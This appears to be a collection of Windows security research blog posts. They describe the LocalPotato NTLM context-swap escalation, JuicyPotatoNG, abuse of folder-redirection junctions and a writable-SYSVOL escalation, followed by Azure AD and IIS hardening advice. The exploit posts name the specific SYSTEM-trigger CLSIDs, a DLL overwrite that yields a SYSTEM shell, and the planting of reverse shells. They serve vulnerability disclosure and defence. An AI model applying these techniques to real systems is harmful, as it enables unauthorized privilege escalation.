Microsoft enforced the Redirection Guard for the Group Policy Client to prevent a process from following a junction point if it was created with a lower integrity level.


This successfully resolved all the security issues with Group Policy processing, many of which had been reported and partially addressed.

Thats all 😉

LocalPotato – When Swapping The Context Leads You To SYSTEM

By: Decoder
13 February 2023 at 10:23

Here we are again with our (me and @splinter_code) new *potato flavor, the LocalPotato! This was a cool finding so we decided to create a dedicated website 😉

The journey to discovering the LocalPotato began with a hint from our friend Elad Shamir, who suggested examining the “Reserved” field in NTLM Challenge messages for potential exploitation opportunities.

After extensive research, it ended up with the “LocalPotato”, a not-so-common NTLM reflection attack in local authentication allowing for arbitrary file read/write. Combining this arbitrary file write primitive with code execution allowed us to achieve a full chain elevation of privilege from user to SYSTEM.

We reported our findings to the Microsoft Security Response Center (MSRC) on September 9, 2022, and it was resolved with the release of the January 2023 patch Tuesday and assigned the CVE number CVE-2023-21746.


Local NTLM Authentication

The NTLM authentication mechanism is part of the NTLMSSP (NTLM Security Support Provider), which is supported by the Windows security framework called SSPI (Security Support Provider Interface).
SSPI provides a flexible API for handling authentication tokens and supports several underlying providers, including NTLMSSP, SPNEGO, Kerberos, etc…

The NTLM authentication process involves the exchange of three types of messages (Type 1, Type 2, and Type 3) between the client and the server, processed by the NTLMSSP.
The SSPI authentication handshake abstracts away the details of NTLM and allows for a mechanism-independent means of applying authentication, integrity, and confidentiality primitives.

Local authentication is a special case of NTLM authentication in which the client and server are on the same machine.
The client acquires the credentials of the logged-in user and creates the Type 1 message, which contains the workstation and domain name of the client.
The server examines the domain and workstation information and initiates local authentication if they match.
The client then receives the Type 2 message from the server and checks the presence of the “Negotiate Local Call” flag to determine if the security context handle is valid.
If it is, the default credentials are associated with the server context, and the resulting Type 3 message is empty.
The server then verifies that the security context is bound to a user, and if so, authentication is complete.

In summary, during local authentication, the “Reserved” field which is usually set to zero for non-local authentication in the NTLM type 2 message, will reference the local server context handle that the client should associate to.

In the above figure, we have highlighted the Reserved field containing the upper value of the context handle.

The Logic Bug

The NTLM authentication through SPPI is often misunderstood to involve direct mutual authentication between the client and server. However, in reality, the local authenticator (LSASS) is always involved, acting as the intermediary between the two.
It is responsible for creating the messages, checking the identity permissions, and generating the proper tokens. 

The objective of our research was to intercept a local NTLM authentication as a non-privileged local or domain user, and “swap” the contexts (NTLM “Reserved” field) with that of a privileged user (e.g. by coercing an authentication). 

This would allow us to authenticate against a server service with these credentials, effectively exchanging the identity of our low-privileged user with a more privileged entity like SYSTEM. If successful, this would indicate that there are no checks in place to validate the Context exchanged between the two parties involved in the authentication.

The attack flow is as follows:

  • Coerce the authentication of a privileged user against our server.
  • Initiate an NTLM authentication of our client against a server service.
  • Interception of the context “B” (Reserved bytes) of the NTLM Type 2 message coming from the server service where our unprivileged client is trying to authenticate.
  • Retrieval of the context “A” (Reserved bytes) of the NTLM Type 2 message produced by our server when the privileged client tries to authenticate.
  • Swap context A with B so that the privileged client will authenticate against the server service on behalf of the unprivileged client and vice versa.
  • Retrieve both NTLM Type 3 empty response messages and forward them in the correct order to complete both authentication processes.
  • As a result of the context swap, the Local Security Authority Subsystem (LSASS) will associate context B with the privileged identity and context A with the unprivileged identity. This results in the swap of contexts, allowing our malicious client to authenticate on behalf of the privileged user.

Below is a graphical representation of the attack flow:

To validate our assumptions about the context swap attack we did set up a custom scenario.
In our experiment, we used two socket servers and two socket clients to authenticate via NTLM with different users and exchange each other’s “context”.
Both parties were negotiating the NTLM authentication over a socket through SSPI.
In particular the clients with two calls to InitializeSecurityContext() and the servers with two calls to AcceptSecurityContext().

After some adjustments, we were successful in swapping identities and we were able to trick LSASS by associating  the context with the “wrong” server. 

To exploit this in a real-world scenario, we then had to find a useful trigger for coercing a privileged client and an appropriate server service.

The Triggers for coercing a privileged client

Based on our previous research, we identified two key triggers for coercing a privileged client: the BITS service attempting to authenticate as the SYSTEM user via HTTP on port 5985 (WinRM), and authenticated RPC/DCOM privileged user calls.

RogueWinRM is a technique that takes advantage of the BITS service’s attempt to authenticate as the SYSTEM user via HTTP on port 5985. Since this port is not enabled by default on Windows 10/11, it provides an opportunity to implement a custom HTTP server that can capture the authentication flow. This allows us to obtain SYSTEM-level authentication.

RemotePotato0 is a method for coercing privileged authentication on a target machine by taking advantage of standard COM marshaling. In our scenario, we discovered three interesting default CLSIDs that authenticate as SYSTEM:

  1. CLSID: {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
    The ActiveX Installer Service “AxInstSv” is available only on Windows 10/11.
  2. CLSID: {854A20FB-2D44-457D-992F-EF13785D2B51}
    The Printer Extensions and Notifications Service “PrintNotify” is available on Windows 10/11 and Server 2016/2019/2022.
  3. CLSID: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}
    The Universal Print Management Service “McpManagementService” is available on Windows 11 and Server 2022.

By leveraging one of these triggers we could have the proper privileged identity to abuse.

Exploiting a server service 

Initially, we tried to find a privileged candidate for our server service by examining the exposed RPC services, such as the Service Control Manager. However, we encountered a problem with local authentication to RPC services, as it is not possible to perform any reflection or relay attacks due to mitigations in the RPC runtime library (rpcrt4.dll).

As explained in this blog post by James Forshaw, Microsoft has added a mitigation in the RPC runtime to prevent authentication relay attacks from being successful.
This is done in “SSECURITY_CONTEXT::ValidateUpgradeCriteria()” by checking if the authentication for an RPC connection was from the local system, and if so, setting a flag in the security context. The server will then reject the RPC call if this flag is set, before any code is called in the server. The only way to bypass this check is to either have authentication from a non-local system or have an authentication level of RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or higher, which requires knowledge of the session key for signing or encryption which of course mitigate effectively any relaying attempts.

Next, we turned our attention to the SMB server, with the goal of performing an arbitrary file write with elevated privileges. 

The only requirement was that the SMB server should not require signing, which is the default for servers that are not Domain Controllers. 

However, we found that the SMB protocol also has some mitigations in place to prevent cross-protocol reflection attacks. 

This mitigation, also referred as CVE-2016-3225, has been released to address the WebDAV->SMB relaying attack scenario.

Basically, it requires the use of the SPN “cifs/127.0.0.1” when initializing local authentication through InitializeSecurityContext() for connecting to the SMB server, even for authentication protocols other than Kerberos, such as NTLM.

The main idea behind this mitigation is to prevent relaying local authentication between two different protocols, which would result in an SPN mismatch in the authenticator and ultimately lead to an access denied error.

According to James Forshaw article “Windows Exploitation Tricks: Relaying DCOM Authentication“, it is possible to trick a privileged DCOM client into using an arbitrary Service Principal Name (SPN) to forge an arbitrary Kerberos ticket.
While this applies for Kerberos, it turns out that it can also affect the SPN setting in an NTLM authentication.
For this reason we chose to use the RPC/DCOM trigger for coercing a privileged client because we could return an arbitrary SPN in the binding strings of the Oxid resolver, thus bypassing the SMB anti-reflection mechanism.
All we needed to do was to set an SPN of “cifs/127.0.0.1” in the originating privileged client, which was not a problem thanks to our trigger:

In the end, we were able to write an arbitrary file with SYSTEM privileges and arbitrary contents.
The network capture of the SMB packets shows us successfully authenticating to the C$ share as the SYSTEM user and overwriting the file PrintConfig.dll:

The POC

Creating a proof of concept for LocalPotato was a challenging task as it required writing SMB packets and sending them through the loopback interface for low-level NTLM authentication, accessing the local share, and finally writing a file.
We relied on Wireshark captures and Microsoft’s MS-SMB2 protocol specifications to complete the process. After multiple tests and code adjustments, we were finally successful.


To simplify the attack chain, we opted to eliminate the redirection to a non-Windows machine listening on port 135 and instead have the fake oxid resolver running on the Windows victim machine, so that the Potato trigger is local and the whole attack chain is fully local.

Just like we did in JuicyPotatoNG, we leveraged the SPPI hooks to manipulate NTLM messages coming to our COM server from the privileged client, enabling the Context Swapping.

There are various methods to weaponize an arbitrary file write into code execution as SYSTEM, such as using an XPS Print Job or NetMan DLL Hijacking. So you are free to combine the LocalPotato primitive with what you prefer 😉

Converting an arbitrary file write into EoP is relatively straightforward.
In our case, we utilized the McpManagementService CLSID on a Windows 2022 server, overwrote the printconfig.dll library, and instantiated the PrintNotify object.
This forced the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:

The LocalPotato POC is available at → https://github.com/decoder-it/LocalPotato

The Patch

The main focus of the analysis was the function SsprHandleChallengeMessage(), which handles NTLM challenges. 

The LocalPotato vulnerability was found in the NTLM authentication scheme. To locate the source of the vulnerability, we conducted a binary diff analysis of msv1_0.dll, the security package loaded into LSASS to handle all NTLM-related operations:

We observed the addition of a new check for the enabled feature “Feature_MSRC74246_Servicing_NTLM_ServiceBinding_ContextSwapping” when authentication occurs:

The check introduced by Microsoft ensures that if the ISC_REQ_UNVERIFIED_TARGET_NAME flag is set and an SPN is present, the SPN is set to NULL. 

This change effectively addresses the vulnerability by disrupting this specific exploitation scenario. 

The SMB anti-reflection mechanism checks for the presence of a specific SPN, such as “cifs/127.0.0.1”, to determine whether to allow or deny access. With the patch in place, a NULL value will be found, thus denying the authentication.
It’s important to note that the ISC_REQ_UNVERIFIED_TARGET_NAME flag is passed and used by the DCOM privileged client, but prior to this patch, it was not taken into consideration for NTLM authentication.

Microsoft has released patches for supported versions of Windows, but don’t worry if you have an older version. 0patch provides fixes for LocalPotato for unsupported versions as well!

Conclusion

In conclusion, the LocalPotato vulnerability highlights the weaknesses of the NTLM authentication scheme in local authentication. 

Microsoft has resolved the issue with the release of the patch CVE-2023-21746, but this fix may just be a workaround as detecting forged context handles in the NTLM protocol may be difficult.

It is important to note that this type of attack is not specific to the SMB or RPC protocols, but rather a general weakness in the authentication flow.
Other protocols that use NTLM as authentication method may still be vulnerable, provided exploitable services can be found.

What’s next?

Well, to be honest, we ran out of ideas. But for sure, if we’ll find something new it will be the “Golden Potato”!

Acknowledgments

Our thanks go to these two top security researchers:

  • Elad Shamir (@elad_shamir) who gave us the initial idea and with whom we constantly discussed and debated this topic

James Forshaw (@tiraniddo) who gave us useful hints when everything seemed to be lost

Giving JuicyPotato a second chance: JuicyPotatoNG

By: Decoder
21 September 2022 at 17:07

Well, it’s been a long time ago since our beloved JuicyPotato has been published. Meantime things changed and got fixed (backported also to Win10 1803/Server2016) leading to the glorious end of this tool which permitted to elevate to SYSTEM user by abusing impersonation privileges on Windows systems.

With Juicy2 it was somehow possible to circumvent the protections MS decided to implement in order to stop this evil abuse but there were some constraints, for example requiring an external non Windows machine redirecting the OXID resolution requests.

The subset of CLSID’s to abuse was very restricted (most of them would give us an Identification token), in fact it worked only on Windows10/11 versions with the “ActiveX Installer Service”. The “PrintNotify” service was also a good candidate (enabled also on Windows Server versions) but needed to belong to the “INTERACTIVE” group which in fact limited the abuse of service accounts.

When James Forshaw published the post about relaying Kerberos DCOM authentication which is also an evolution of our “RemotePotato0” we reconsidered the limitation given that he demonstrated that it was possible to do everything on the same local machine.

The “INTERACTIVE” constraint could also be easily bypassed as demonstrated by @splinter_code’s magic RunasCs tool.

Putting all the pieces together was not that easy and I have to admit I’m really lazy in coding, so I asked my friend (and coauthor in the *potato saga) @splinter_code for help. He obviously accepted the engagement 🙂

How we implemented it

The first thing we implemented was Forshaw’s “trick” for resolving Oxid requests to a local COM server on a randomly selected port.
We spoofed the image filename of our running process to “System” for bypassing the windows firewall restriction (if enabled) and decided to use port 10247 as the default port given that in our tests this port was generally available locally to a low privileged user.

When we want to activate a COM object we need to take into consideration the security permissions configured. In our case the PrintNotify service had the following Launch and Activation permission:

Given that the INTERACTIVE group was needed for activating the PrintNotify object (identified by the CLSID parameter), we used the following “trick”:

When using LogonUser() API call with Logon Type 9 (NewCredentials), LSASS will build a copy of our token and will add the INTERACTIVE sid along with others, e.g. the new logon session created sid. Due to the fact we created this token through LogonUser() and explicit credentials we don’t need impersonation privileges to impersonate it. Of course, the credentials are fake, but that doesn’t matter as they will be used only over the network while the original caller identity will be used locally.

Last but not least, we needed to capture the authentication in order to impersonate the SYSTEM user. The most obvious solution was to write our own RPC server listening on port 10247 and then simply call RpcImpersonateClient().
However, this was not possible. That’s because when we register our RPC server binding information through RpcServerUseProtseqEp(), the RPC runtime will bind to the specified port and this port will be “busy” for others that try using it.
We could have implemented some hack to enumerate the socket handles in our process and hijack the socket, but that was an unnecessary heavy load of code.

So we decided to implement an SSPI hook on AcceptSecurityContext() function which would allow us to intercept the authentication and get the SYSTEM token to impersonate:

Using this approach through an SSPI hook instead of relying on RpcImpersonateClient() has the double advantage to make this exploit work even when holding only SeAssignPrimaryTokenPrivilege. As you may know the RpcImpersonateClient() requires your process to hold the SeImpersonatePrivilege, so that would have added an unnecessary limitation.

The JuicyPotatoNG TOOL

The source code of JuicyPotatoNG written in Visual Studio 2019 c++ can be downloaded here.

The Port problem

As mentioned, we choose the default COM server port “10247” but sometimes you can run into a situation where the port is not available. The following simple powershell script will help you to find the available ports, just choose the one not already in use and you’re done.

Countermeasures

Be aware, this is not considered by MS a “Security Boundary” violation. Abusing impersonation privileges is an expected behavior 😉

So what can we do in order to protect ourselves?

First of all, service accounts and accounts with these privileges should be protected by strong passwords and strict access policies, and in case of service accounts “Virtual service accounts” or “Group Managed Service Accounts” should be used. You could also consider removing unnecessary privileges as described in of of my posts but this is not totally secure too…

In this particular case, just disabling the “ActiveX Installer Service” and the “Print Notify Service” will inhibit our exploit (and has no serious impact). But remember there could be “third parties” CLSID’s with SYSTEM impersonation too..

Conclusions

This post is the demonstration that you should never give up and always push the limits one step further 🙂 … and we have other *potato ready, so stay tuned!

Special thanks to the original “RottenPotato” developers, Giuseppe Trotta, and as usual to James Forshaw

That’s all 😉

Update

It seems that Microsoft “fixed” the INTERACTIVE trick and JuicyPotatoNG stopped working. But guess what, there is another CLSID which does not require the INTERACTIVE group and impersonates SYSTEM: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}

Runs only on win11/2022…

Authors of this post: @decoder_it, @splinter_code

Group Policy Folder Redirection CVE-2021-26887

By: Decoder
27 April 2022 at 17:30

Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with CVE-2021-26887 even if they did not really fix the issue (“folder redirection component interacts with the underlying NTFS file system has made this vulnerability particularly challenging to fix”). The proposed solution was reconfiguring Folder Redirection with Offline files and restricting permission.

I completely forgot about this case until the last few days when I came across my report and then decided to publish my findings (don’t expect nothing very sophisticated)

There is also an “important” update at the end.. so keep on reading 🙂

Summary

If “Folder Redirection” has been enabled via Group Policy and the redirected folders are hosted on a network share, it is possible for a standard user who has access on this file server to access other user’s folders and files (information disclosure) and eventually perform code execution and privilege escalation

Prerequisites

  1. A Domain User Group Policy with “Folder Redirection” has to be configured.
  2. A standard local or domain user has be able to login on the file server configures with the folder redirection shares (rdp, WinRm, ssh,…)
  3. There have to be domain users which will logon for the first time or will have the folder redirection policy applied for the first time

 

Steps to reproduce

In this example I used 3 VM’s:

  1. Windows 2019 Server acting as Domain Controller
  2. Windows 2019 Member Server acting as File Server
  3. Windows 10 domain joined client

On the domain controller I create a “Folder Redirection” Policy. In my example, I’m going to use the “Default Domain Policy” and redirect two folders, the user’s “Documents” and “AppData” Folder on a network share located on server “S01”.

The policy can be found in the SYSVOL share of the DC’s:

The folder redirected share is accessible via network path \\S01\users$. The permissions on this folder have been configured on server “S01” according to MS document: https://docs.microsoft.com/en-us/windows-server/storage/folder-redirection/deploy-folder-redirection

In my case “S01\Users” group is the group which will be applied the policy because this group contains the “Domain Users” groups too.

Each time domain user login to the domain the documents & appdata  folders (in this case) are saved on the network share. If it the first time the user logs in, the necessary directories are created under the share with strict permissions:

Someone could think to create the necessary directories before the domain users logs in, grant himself and the domain user full control and then access this private folder and data afterwards.

This is not possible, because during the first logon, if the folder already exists, a strict check on ownership and permissions are made and if they don’t match the folder will not be used. (I verified this with “procmon”)

But if the shared directory has valid permissions and owner, during the subsequent logins, no more checks on permissions are made and this could be a potential security issue.

How can I accomplish this? This is what I will do:

As a standard local/domain user login on the server where the shares are hosted (I know this is not so common..)

I will create a “junction” for the “a new” user who did not login to domain up to now or did not apply the Folder Redirection policy. (Finding “new” users is a real easy task for a standard domain user, so I won’t explain it). In my case, for example, “domainuser3”

Now I have to wait for domainuser3 to login from his Windows 10 (in my case) Documents…)

The Folder Redirection policy has been applied and permissions are set on the folders.

But as we can see on the fileserver S01, my junction point has been followed too, the real location of the folders is here:

Now, all the malicious user “localuser” has to do is wait for the domainuser3 logoff , delete the junction , create the new folders under the original share:

… and the set the permissions (Documents & AppData in our case) so that “everyone” will be granted full control:

Given that in my case the “AppData” folder is also redirected, we could place a “malicious” program in the user’s Startup folder which will then be executed at login (for example a reverse shell)

At this point, “localuser” has to wait for the next login of “domainuser3”

And will get a shell impersonating domainuser3 (imagine if it was a high privileged user):

Of course he will be able to access with full control permissions the documents folder:

Conclusions:

Even if the pre-conditions are not so “common”, this vulnerability could easily lead to information disclosure and EoP.

Update

So far the report, but when I read again the mitigations suggested by MS something was not so clear. The first time the user logs in, the necessary security checks are performed, so why did they say that it was not possible to fix? All they had to do was to perform these checks not only at the first logon, right?

My best guess is that if the profile, or more precisely the registry entry HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\<user_sid> is not found, checks are performed otherwise skipped.

A quick test demonstrated that I was right, after the first logon, I deleted the registry entry and security checks were again performed.

Maybe that the answer is in fdeploy.dll, for example in CEngine::_ProcessFRPolicy, I need to investigate further… or maybe I’m missing something, but this exercise is left to the reader.

That’s all 😉

A not-so-common and stupid privilege escalation

By: Decoder
25 April 2022 at 15:26

Some time ago, I was doing a Group Policy assessment in order to check for possible misconfigurations. Apart running the well known tools, I usually take a look at the shared SYSVOL policy folder. The SYSVOL folder is accessible in read-only by all domain users & domain computers. My attention was caught at some point by the “Files.xml” files located under a specific user policy:

This policy settings were related to the “File Preference” Group policy settings running under the user configuration.

According to Microsoft this policy allows you to:

In this case, an exe file (CleanupTask.exe) was copied from a shared folder under a specific location under “Program Files” folder (the folder names are invented for confidentiality reasons). The “CleanupTask” executable was run by the Windows Task Scheduler every hour under the SYSTEM user.

The first question was, why not running under the computer configuration? Short answer: only some users had this “custom application” installed which needed to be replaced, so the policy was filtered for a particular users group, in our case “CustomApp” group and luckily my user “user1” was member of this group.

The policy was executed without impersonating the user (so under the SYSTEM context), otherwise I would have found and entry “userContext=1” in the xml file. This was necessary because a standard user cannot write in %ProgramFiles%

In addition the policy was run only once (FilterRunOnce), which would have prevented multiple copies each time the user logged in.

To sum it up this was the policy configuration from the DC perspective:

Now that I had a clear vision of this policy, I took a look at the shared hidden folder.. and guess what? It was writable for domain users, a real dangerous misconfig…

I think you already got it, I could place an evil executable (reverse shell, add my user to local admins and so on) in this directory, perform a gpupdate /force which would copy the evil program in “Program Files\CustomApp\Maintenance” and the wait for the CleanUptask to execute….

But I had still a problem, this policy was applied only once and in my case I was already too late.. so no way? Not at all. The evidence that the policy has already been executed is stored under a particular location in the Windows Registry under the “Current User” hive which we can modify…

All I needed to do was deleting the guid referring to the filter id of the group policy and then run gpudate /force again and perform all the nasty things…

Misconfigurations in Group Policies, especially those involving file operations can be very dangerous, so publish them after an extremely careful review 😉

Hands off my (MS) cloud services!

By: Decoder
6 April 2021 at 15:08

Ok, this title is deliberately provocative, but the goal of this post is just to share some (as usual) “quick & dirty” tricks with all of you concerned about securing your Microsoft’s O365/Exchange/AzureAD online instances.

If you are facing the problem of having one or more services exposed on Microsoft cloud and want to have a clearer view of security configurations, it’s no easy to find the right path despite there are a ton of online resources about this subject.

Since I’m definitely not an expert, I often asked my friend @anformato for help and he always gave me useful tips. So when I later proposed him to write a post together on this topic in order to share “real life” experiences, he enthusiastically accepted.

In this first part we will talk about the Azure Active Directory “ecosystem”.

So let’s start from the beginning!

Azure Active Directory

Probably you have your on premise Active Directory Domain/Forest replicated with your online Azure AD instance, right?

Don’t replicate everything

You should carefully evaluate which objects you really need to synchronize and avoid to replicate everything. Remember “less is more”, and the more you replicate, the more you enlarge a possible attack surface.

Synchronize only the necessary objects (like users,) who really need to access online services. It’s also good practice not replicating administrators and other high privileged users. Azure AD admins should not be shared with on premise admins and vice versa (more on this in the dedicated chapter)

Replication can be easily configured with the “Azure Active Connect” tool:

Remember to perform this task before the first synchronization, otherwise it will be painful to remove unnecessary objects replicated to Azure AD (I had to open a case with MS support…)

Limit Administrative Access

Reducing the number of persistent Global Administrators is really a good practice.
Since only another GA can reset a global admin’s password, you should have at least 2 Global Admin users. (Microsoft recommends do not have more than 4/5 GAs, do you really need more than 5 GA’s?)

Azure AD roles allow you to grant granular permissions to your admins, providing you a way to implement the principle of least privilege. There are a bunch of predefined roles which you should definitely take in consideration for delegating administrative tasks.

A good starting point to understand Role Based Access control is here.

 
You should not use account with admin roles to manage administrative tasks, instead create dedicated accounts for each user with administrative privileges; those account should be cloud only account with no ties to on-premises Active Directory.
 
If your tenant has Azure Active Directory P2 licenses, a good practice is using Privileged Identity Management. It allows to implement just-in-time privileged access to Azure resources and Azure AD with approval flows.
 
All admin users must obviously use MFA, better with MS Authenticator App instead of using SMS or phone call as second authenticator factor. You should definitely avoid using personal account to manage M365 or Azure resources.
 
Last but not least: In order to prevent being accidentally locked out of your Azure Active Directory, have in place a procedure to manage emergency access. Ask yourself what will happen if service is currently unavailable because of network issue or IdP outage, or natural disaster emergency, or other GA users are not available?
Some procedures to manage emergency can be found here.

Restrict access to Azure Portal

By default, every Azure AD user can access the portal even without specific roles. This means they can access the entire directory and get information about AD settings including users, groups, and so on. You might argue, ok a standard Active Directory user can also access all this information on the on premise site, why should I care? Remember, your Azure AD is normally exposed all over the internet, so if the user is compromised it would be a juicy option for an attacker, do you agree? We will talk about it later..

Keep in mind that restricting access to portal does not block access to the various Azure API’s

Third party tools such as @_dirkjan fantastic “roadrecon“, which interacts with some “undocumented” MS Graph API , allow you to dump the whole directory for later investigations and analysis

Restrict access to MSOnline powershell module

This module provides a lot of powershell cmdlets for administering Azure AD. Even if it’s now deprecated, it’s still available and a standard user can by default access the MSOL service and run lot of “get-msol*” commands.

So the question is: how can we stop this? Well, the answer is very simple, as as an admin launch this command in an MSOL session:

This will prevent the possibility for a standard user (not admin) to read other user’s information and in fact inhibit most of the cmdlets:

And also block “roadrecon” tools:

..and AADinternals tools too:

This will also somehow “stop” the dangerous phishing technique via “device code authentication” as described here.

But keep in mind that it will not inhibit other operations, such as sending an email on behalf the victim once obtained the access token. For preventing such types of attacks you should implement dedicated “Conditional access policies”, available with Premium subscriptions.

Back to us, what could be the side effect by setting this flag? To be honest, it’s not so clear. Googling around you can find some old posts stating that if “UsersPermissionToReadOtherUsersEnabled is set to false in Azure Active Directory (AAD), users are unable to add external/internal members in Microsoft Teams”.

We were unable to reproduce this misbehavior with Teams and there is no official note from MS about this. It seems that this problem has been resolved.

You can also completely block access to all MSOL cmdlets, including admins, with the AzureADPreview module:

Know what you are doing because it seems that there is not the possibility to add exception (for example: admin users).

Restrict access to AzureAd powershell module

Given that this module will be the replacement of the MSOL module, if you already disabled the permissions in MSOL cmdlet, the API won’t be available also in AzureAD:

You can even restrict access to the Azure AD powershell by assigning roles, as described here

$appId = "1b730954-1685-4b74-9bfd-dac224a7b894" #azuread

$sp = Get-AzureADServicePrincipal -Filter "appId eq '$appId'"

if (-not $sp) { $sp = New-AzureADServicePrincipal -AppId $appId}

$user = Get-AzureADUser -objectId <upn> #permit only to this user(s) to access Azure Ad PS

New-AzureADServiceAppRoleAssignment -ObjectId $sp.ObjectId -ResourceId $sp.ObjectId -Id ([Guid]::Empty.ToString()) -PrincipalId $user.ObjectId

If user is not explicitly permitted, he cannot access:

Following the same procedure, you can also restrict access to MS Graph module (appid: 14d82eec-204b-4c2f-b7e8-296a70dab67e)

Disable Legacy Authentication

Disabling Legacy Authentication in a must-do if you are thinking about how to reduce your attack surface.

Legacy Authentication refers to all protocols that use the unsecure Basic Authentication mechanism and if you don’t block legacy authentication your MFA strategy won’t be effective as expected.

Among legacy authentication protocols are:

  • Exchange ActiveSync (EAS)
  • Exchange Web Services (EWS)
  • IMAP4
  • MAPI over HTTP (MAPI/HTTP)
  • RPC over HTTP
  • POP3
  • Authenticated SMTP
  • ….

Modern authentication is based on the Active Directory Authentication Library (ADAL) and OAuth 2.0 which support multi-factor authentication and interactive sign-in.

But blocking legacy authentication in your directory is easier to say than done .. you need to evaluate and understand the potential impacts before!

Starting from analyzing Azure AD sign-ins logs could be a good starting point.

  • Navigate to the Azure portal > Azure Active Directory > Sign-ins.
  • Add the Client App column if it is not shown by clicking on Columns > Client App.
  • Add filters > Client App > select all of the legacy authentication protocols. Select outside the filtering dialog box to apply your selections and close the dialog box

Unfortunately there is no magic “recipe”, you should avoid using applications which don’t support modern authentication 😦

For example, if you are still using the unsupported Outlook/Office 2010, it’s really time to upgrade to a newer version.

Blocking legacy authentication using Azure AD Conditional Access

The best way to block legacy authentication to Azure AD is through Conditional Access. Keep in mind it requires at least Azure Active Directory P1 licenses.

You can directly and indirectly block legacy authentication with CA policies and include/exclude specific users and groups as shown here

Consider to enable your blocking policy in Report-only mode to monitor impacts before changing the state of the policy from “Report-Only” to “On”.

Blocking legacy authentication service-side

If you don’t have Azure AD P1 or P2 licenses, the good news is that nothing is lost! Legacy authentication can be blocked service-side or resource-side.

Exchange Online

The easiest way is just to disable the protocols which by default use legacy authentication like Pop3, Imap, …

This can be done via exchange management powershell:

Get-CASMailbox -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | Set-CASMailbox -ImapEnabled $false -PopEnabled $false

With this commands you will disable Imap and Pop3 for all mailbox users. Once done, you can enable only a specific subset of users who really need to use these protocols.

You can also set a global policy which will disable these protocols for all new mailboxes:

Get-CASMailboxPlan -Filter {ImapEnabled -eq "true" -or PopEnabled -eq "true" } | set-CASMailboxPlan -ImapEnabled $false -PopEnabled $false

The problem with this setting could be if you don’t want to block protocols that can do legacy and modern authentication. Exchange Online has a feature named authentication policies that you can use to block legacy authentication per protocol.

To manage authentication policy in Microsoft 365 Admin Center:

  • Navigate to the Microsoft 365 admin center
  • Settings > Org Setting
  • Navigate to Modern Authentication

You can even more fine grain these settings by allowing / disallowing basic authentication protocols for specific users using the authentication policies cmdlets:

New-AuthenticationPolicy -Name "Allow Basic Authentication for POP3"
Set-AuthenticationPolicy -Identity "Allow Basic Authentication for POP3" -AllowBasicAuthPop
Set-user -Identity [email protected] AuthenticationPolicy "Allow Basic Authentication for Pop3"

Sharepoint Online

In order to disable legacy authentication on your Sharepoint Online tenant you can use the follwoing cmdlets:

Connect-SPOService -Url –https://-admin.sharepoint.com
Get-SPOTenant
Set-SPOTenant –LegacyAuthProtocolsEnabled $false

AppLICATIONS, Consent and Permissions.. oh my..

The variegated world of the so-called “Applications” essentially have to interact with the ecosystem of O365 services exposed through public API and it’s up to you to manage and grant the appropriate permissions requested by the Apps. It’s a complex topic and in this chapter we will give you some simple advices. If security is your concern (I bet yes), the first thing to do is is to prohibit users consent for “unknown” apps, given that it’s allowed by default (??).

Why should you do it? Because by setting a more restrictive consent (as highlighted in the screenshot) will prevent most of the well known phishing techniques by abusing “malicious apps” and Oauth2. You can find an excellent example by @merlos here.

If the user clicks on the malicious link in the phishing email, he will no more have the possibility to accept the requested permissions:

But will be presented this screen where the Organization’s Admin approval is required:

You should also disable “Users can register applications” feature 

Only users with administrative roles or a limited subset of users with “Application developer” role  should be allowed to register custom-developed applications after these are reviewed and evaluated also from a security perspective.

Conclusion

In this short we hope to have given you some useful tips on how to somehow secure your tenants. The topic is clearly much more complex and requires dedicated skills, but as usual you have to start from the basics 😉

In next post we will (hopefully) write about logging, auditing, detecting .. stay tuned!

.. and adopt Two Factor Authentication (2FA) for all your users!!

Hands off my IIS accounts!

By: Decoder
14 December 2020 at 16:03

As promised in my previous post, I will (hopefully) give you some advices on how to harden the IIS “Application Pool” accounts aka “identities”.

First of all we need to understand how IIS architecture works and how identities are managed. Therefore I suggest you to read some specific posts about this topic for example this one and this one . More about identities can be found here

Ok! now that you got all the details let’s start from the IIS worker process “w3wp”. This is the process which will effectively access the http resources we asked for and serve them. By default this process runs under the “ApplicationPoolIdentity” identity. This is nothing more than (in this case the default) a “Virtual Account”, with the name of the Application Pool Identity, which IIS creates for us. Virtual accounts are directly managed by OS, so you don’t need to set passwords.

We can create dedicated Application Pools and assign them to web sites. Given that every application pool then has his own Virtual Account, we can secure access to resources based on the single application pool identity.

This is really cool, so we are able to set our security boundaries.

Let’s take a closer look at the process:

We can observe that the AppPool identity is member of the built in “IIS_IUSRS” group and also the “SERVICE” group. Unfortunately, it has also 2 dangerous privileges: SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, probably the most abused privileges for escalations when you are able to get code execution on a buggy web application (in the following screenshot we uploaded a webshell), do you agree?

I think that everyone who is responsible / concerned for securing IIS Web Applications would like to limit these privileges, especially if they aren’t needed. In fact, the impersonation privileges are only useful if IIS needs to impersonate the Windows user who accessed the web app (<identity impersonate=true>), otherwise who cares?

So the first question is: is it safe to remove the privileges in this context?

There is no official documentation from MS about this, but there is not reason why it should lead to problems as long as you don’t need to impersonate

Now let’s see how privileges are configured.

We need to launch the Policy editor “gpedit.msc” and go to:

Computer Configuration->Windows Settings->Security Settings->Local Policies->User Right Assignment

This is the configuration for the “Impersonate a client after Authentication” (SeImpersonatePrivilege):

Bad news, IIS_IUSRS and SERVICE group have this privilege by default, and the Application Pools Identities belongs to these groups.

For the “Replace a process level token” (SeAssignPrimaryPrivilege) we have:

Again, our Applications Pool Identities and SERVICE groups have this privilege.

We could indeed inhibit the automatic membership to “IIS_IUSRS” group by modifying the appropriate xml file following MS official documentation (side note: I was not able to perform this action, got always an HTTP error 503 if set to “true”):

But this would not solve our problem given that the Application Pools Identities belongs to SERVICE group by default and we cannot remove this group from the Application Pool. Moreover, we cannot remove Impersonation Privileges for the SERVICE group.

So what can we do?

First of all we have to forget 😦 the Virtual Accounts and assign to our Application Pool a “real” Windows Account (just a standard user with a very strong password and set to “never expires”).

Let’s see the result:

The user (web) is no more member of the SERVICE group, this is a good starting point.

